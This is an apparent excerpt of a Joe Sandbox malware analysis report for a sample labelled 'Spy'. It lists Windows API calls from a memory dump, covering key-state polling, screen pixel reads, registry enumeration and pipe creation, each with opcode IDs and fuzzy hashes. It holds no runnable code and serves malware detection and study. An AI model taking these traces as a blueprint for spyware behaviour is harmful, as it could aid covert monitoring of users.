                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00AE73BC
                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00AE73F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CreateHandle$FilePipe
                                                      • String ID: nul
                                                      • API String ID: 4209266947-2873401336
                                                      • Opcode ID: 095ad592bcd39847af4025261368a9d25c85aefadbc63d8315cffd570a69a889
                                                      • Instruction ID: e10f4f3817ee84574df0a4c9714a220c53a76df0256bcf63bc7af4a8a1a1ccfd
                                                      • Opcode Fuzzy Hash: 095ad592bcd39847af4025261368a9d25c85aefadbc63d8315cffd570a69a889
                                                      • Instruction Fuzzy Hash: 4E218174508347ABDB209F6ADC05A9E7BA5AF44720F204A19FDA0DB2D0DBB0DC50DB50
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00AE7444
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AE7476
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00AE7487
                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00AE74C1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CreateHandle$FilePipe
                                                      • String ID: nul
                                                      • API String ID: 4209266947-2873401336
                                                      • Opcode ID: ec54b848bf6765016d17f7673cb3baa7dc4aa3805b312e12fbfe69208dc9e5ec
                                                      • Instruction ID: 40662fa1649d856fde4d036a9e2d552cb2b4805ce40bb9da2f03b922eea13f40
                                                      • Opcode Fuzzy Hash: ec54b848bf6765016d17f7673cb3baa7dc4aa3805b312e12fbfe69208dc9e5ec
                                                      • Instruction Fuzzy Hash: 9E21B6715083869BDB20AF6A9C44E9D7BF8AF55730F204B19FDA0D72D0DB709851C750
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00AEB297
                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00AEB2EB
                                                      • __swprintf.LIBCMT ref: 00AEB304
                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,00B10980), ref: 00AEB342
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                      • String ID: %lu
                                                      • API String ID: 3164766367-685833217
                                                      • Opcode ID: a10cac855504bdf65b804e59bd831bfae328118afaa00438f13afe62d0c9bb36
                                                      • Instruction ID: ba314bc375b1d3f088d5e49e2f611857807e4f6ac937737f6b7a682ca2e30c0d
                                                      • Opcode Fuzzy Hash: a10cac855504bdf65b804e59bd831bfae328118afaa00438f13afe62d0c9bb36
                                                      • Instruction Fuzzy Hash: 37214135A00109AFCB10EF65C985DEEBBF8EF49704B508069F905EB252DB71EE45CB61
                                                      APIs
                                                        • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                        • Part of subcall function 00ADAA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ADAA6F
                                                        • Part of subcall function 00ADAA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ADAA82
                                                        • Part of subcall function 00ADAA52: GetCurrentThreadId.KERNEL32 ref: 00ADAA89
                                                        • Part of subcall function 00ADAA52: AttachThreadInput.USER32(00000000), ref: 00ADAA90
                                                      • GetFocus.USER32 ref: 00ADAC2A
                                                        • Part of subcall function 00ADAA9B: GetParent.USER32(?), ref: 00ADAAA9
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00ADAC73
                                                      • EnumChildWindows.USER32(?,00ADACEB), ref: 00ADAC9B
                                                      • __swprintf.LIBCMT ref: 00ADACB5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                      • String ID: %s%d
                                                      • API String ID: 1941087503-1110647743
                                                      • Opcode ID: b29d675ee51e0bab5cf378c2566568b18b5cdd81b6728d57371d54747f756d79
                                                      • Instruction ID: 71e0c70c375cd2b7a58e8295d67cb6a32a751a95b483aba3de646e52bc79fdb7
                                                      • Opcode Fuzzy Hash: b29d675ee51e0bab5cf378c2566568b18b5cdd81b6728d57371d54747f756d79
                                                      • Instruction Fuzzy Hash: 5F11E775210205ABCF11BFA0CE85FEA37ACAB54710F008076FD0A9A252CA745945DB71
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00AE2318
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                      • API String ID: 3964851224-769500911
                                                      • Opcode ID: 9acace8dfa088530c946eadc7901da42006cf9b30bc573cc9752201a78290db8
                                                      • Instruction ID: 2fd0fd576697610510e16b1838216ad3aaa16ce35ac7b2e6b5df29e2eddf86c2
                                                      • Opcode Fuzzy Hash: 9acace8dfa088530c946eadc7901da42006cf9b30bc573cc9752201a78290db8
                                                      • Instruction Fuzzy Hash: FF117C719101199FCF00EF94C9919EEB3B8FF26344F6080A8E810A72A1EB326D06CF40
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00AFF2F0
                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00AFF320
                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00AFF453
                                                      • CloseHandle.KERNEL32(?), ref: 00AFF4D4
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                      • String ID:
                                                      • API String ID: 2364364464-0
                                                      • Opcode ID: 0087141aba0baf07cebe9c663b76cd0dce4a2fb1ec4676d76f03cdfe71b2e943
                                                      • Instruction ID: c4e0577177312a0bd9424c21b717a0a0f46268b5c1b0687a5012c6f3e53f3004
                                                      • Opcode Fuzzy Hash: 0087141aba0baf07cebe9c663b76cd0dce4a2fb1ec4676d76f03cdfe71b2e943
                                                      • Instruction Fuzzy Hash: C88184716043019FD720EF68D986F6EB7E5AF48710F14891DFA99DB392EBB0AC408B51
                                                      APIs
                                                        • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                        • Part of subcall function 00B0147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0040D,?,?), ref: 00B01491
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B0075D
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B0079C
                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B007E3
                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00B0080F
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00B0081C
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                      • String ID:
                                                      • API String ID: 3440857362-0
                                                      • Opcode ID: a718e0c02b4d4cc455a7c94385c6dbee1e2ecf20362dbef2686a7ff7155d81b9
                                                      • Instruction ID: 23fd003b36390aed1366f480d901e21cb5e67fc74f68f9ba42044d8d3b6b5fb1
                                                      • Opcode Fuzzy Hash: a718e0c02b4d4cc455a7c94385c6dbee1e2ecf20362dbef2686a7ff7155d81b9
                                                      • Instruction Fuzzy Hash: F7516A71218205AFC704EF64C981FAABBE9FF88304F40895DF596872A1EB30ED04CB52
                                                      APIs
                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00AEEC62
                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00AEEC8B
                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00AEECCA
                                                        • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                        • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00AEECEF
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00AEECF7
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 1389676194-0
                                                      • Opcode ID: e788e2e38ed1f839617d95cc2a694d30a04f83ce509f6b495fbd113ff687b82e
                                                      • Instruction ID: c7409af63e3bbe9d49ce873eea889a85985b085d50e0c1b81f6f58d0937a00af
                                                      • Opcode Fuzzy Hash: e788e2e38ed1f839617d95cc2a694d30a04f83ce509f6b495fbd113ff687b82e
                                                      • Instruction Fuzzy Hash: 45512A35A00119DFCB01EF65CA85EAEBBF5EF0D314B148099E809AB3A1DB31ED51DB90
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d139672f6ed9359fb1c9d41f4c10e2810698019814564e562e0c785fadb86ddc
                                                      • Instruction ID: c9f8ed7ade3041d236902078cc357ce16913d4d56c387c8605e2b8769ee2d179
                                                      • Opcode Fuzzy Hash: d139672f6ed9359fb1c9d41f4c10e2810698019814564e562e0c785fadb86ddc
                                                      • Instruction Fuzzy Hash: F641D035904214AFD720DB28CC88FA9BFF8EB09310F5489A5F916A72D1CB70AD41DA91
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 00A82727
                                                      • ScreenToClient.USER32(00B477B0,?), ref: 00A82744
                                                      • GetAsyncKeyState.USER32(00000001), ref: 00A82769
                                                      • GetAsyncKeyState.USER32(00000002), ref: 00A82777
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: AsyncState$ClientCursorScreen
                                                      • String ID:
                                                      • API String ID: 4210589936-0
                                                      • Opcode ID: 91765a0ba9bf56245010c50d45fc1f572c7b0f0526bb3339782c118c0d484be2
                                                      • Instruction ID: c3b8855ecbb31b9226bc472da62046e87461ec0baf1d074ec6598700f89f1d89
                                                      • Opcode Fuzzy Hash: 91765a0ba9bf56245010c50d45fc1f572c7b0f0526bb3339782c118c0d484be2
                                                      • Instruction Fuzzy Hash: EE416C75504119FFDF15AF69C844EE9BBB8BB05334F50835AF82896291CB30ADA0DB91
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 00AD95E8
                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00AD9692
                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00AD969A
                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 00AD96A8
                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00AD96B0
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessagePostSleep$RectWindow
                                                      • String ID:
                                                      • API String ID: 3382505437-0
                                                      • Opcode ID: 2d90125b901a0c8a518610768ebe036e075a11daa472d98feaac167b8ba57d07
                                                      • Instruction ID: 45a5067ec412803f47c72d88cc31fb3ee7a4ddc4e4985759950be425b86cd93f
                                                      • Opcode Fuzzy Hash: 2d90125b901a0c8a518610768ebe036e075a11daa472d98feaac167b8ba57d07
                                                      • Instruction Fuzzy Hash: C931CC71900219EFDB14CF68D94CADE3BB5FB44315F10822AF926AB2D0C7B0D964DB90
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 00ADBD9D
                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00ADBDBA
                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00ADBDF2
                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00ADBE18
                                                      • _wcsstr.LIBCMT ref: 00ADBE22
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                      • String ID:
                                                      • API String ID: 3902887630-0
                                                      • Opcode ID: 967a03194390b26f301a261087441322e175b86dd0c8b0b398593ea6255a4c04
                                                      • Instruction ID: 80e2bfb6f9bdfd9b73446817e5a6e1cb1e2b8a410604e1a807ab1951c0507393
                                                      • Opcode Fuzzy Hash: 967a03194390b26f301a261087441322e175b86dd0c8b0b398593ea6255a4c04
                                                      • Instruction Fuzzy Hash: 8021F932614204FFEB255B399C49EBB7BADDF45760F11802AF90ADB291EF61DC509270
                                                      APIs
                                                        • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00B0B804
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00B0B829
                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B0B841
                                                      • GetSystemMetrics.USER32(00000004), ref: 00B0B86A
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00AF155C,00000000), ref: 00B0B888
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$MetricsSystem
                                                      • String ID:
                                                      • API String ID: 2294984445-0
                                                      • Opcode ID: 245445fd87a17e92e5c3839806f3b91a7ab3940e5eb873c6bc4380944f8d5c09
                                                      • Instruction ID: 15d8e47e737ac5bf6d6f06e35c6651d1f90150b3a0963fe53618adcd74727aa8
                                                      • Opcode Fuzzy Hash: 245445fd87a17e92e5c3839806f3b91a7ab3940e5eb873c6bc4380944f8d5c09
                                                      • Instruction Fuzzy Hash: 4D219131A24215AFCB149F398C48F6A3BE9FB05724F148769F921D72E0DB708950CB80
                                                      APIs
                                                      • IsWindow.USER32(00000000), ref: 00AF6159
                                                      • GetForegroundWindow.USER32 ref: 00AF6170
                                                      • GetDC.USER32(00000000), ref: 00AF61AC
                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00AF61B8
                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00AF61F3
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Window$ForegroundPixelRelease
                                                      • String ID:
                                                      • API String ID: 4156661090-0
                                                      • Opcode ID: f7db6851d03ee61f3c6cccc8443838fbec16001bbc211e59b00053fde1a7e89f
                                                      • Instruction ID: 61ac99d6835c63bf98f6a379f3acdc7f6e51ae0effdf92858ed4999c46857449
                                                      • Opcode Fuzzy Hash: f7db6851d03ee61f3c6cccc8443838fbec16001bbc211e59b00053fde1a7e89f
                                                      • Instruction Fuzzy Hash: 1E21A175A00204AFD700EFA5DD84AAABBF9EF88350F04C469F94AD7352CE74AC40CB90
                                                      APIs
                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A81729
                                                      • SelectObject.GDI32(?,00000000), ref: 00A81738
                                                      • BeginPath.GDI32(?), ref: 00A8174F
                                                      • SelectObject.GDI32(?,00000000), ref: 00A81778
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ObjectSelect$BeginCreatePath
                                                      • String ID:
                                                      • API String ID: 3225163088-0
                                                      • Opcode ID: 8cb1a03cc2020f6edac8ba59d8da58d2e9900f56b2880e16b2499f24f8cff946
                                                      • Instruction ID: 1292f7c95c73068c30605fd8bd9a5d83a39e18ae59b0bba78c38f7fbfd67c380
                                                      • Opcode Fuzzy Hash: 8cb1a03cc2020f6edac8ba59d8da58d2e9900f56b2880e16b2499f24f8cff946
                                                      • Instruction Fuzzy Hash: 7F219034814208EBDB10EF6ADD48BA97BACF701321F14422AF855971A0DFB09A92CF90
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      • Opcode ID: 9251d0c5304f8c771dc89b6723b507fb002e5606113ecfc29594f813e35ded54
                                                      • Instruction ID: d0674d4143885b1eddd32edde9c75990aa6cb869bba9b885f1077a10d6c13e7e
                                                      • Opcode Fuzzy Hash: 9251d0c5304f8c771dc89b6723b507fb002e5606113ecfc29594f813e35ded54
                                                      • Instruction Fuzzy Hash: B401D272A442063BD60466109E82FEF73ACDA217A4F544126FE07D7382F760DE10E2E0
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00AE5075
                                                      • __beginthreadex.LIBCMT ref: 00AE5093
                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00AE50A8
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00AE50BE
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00AE50C5
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
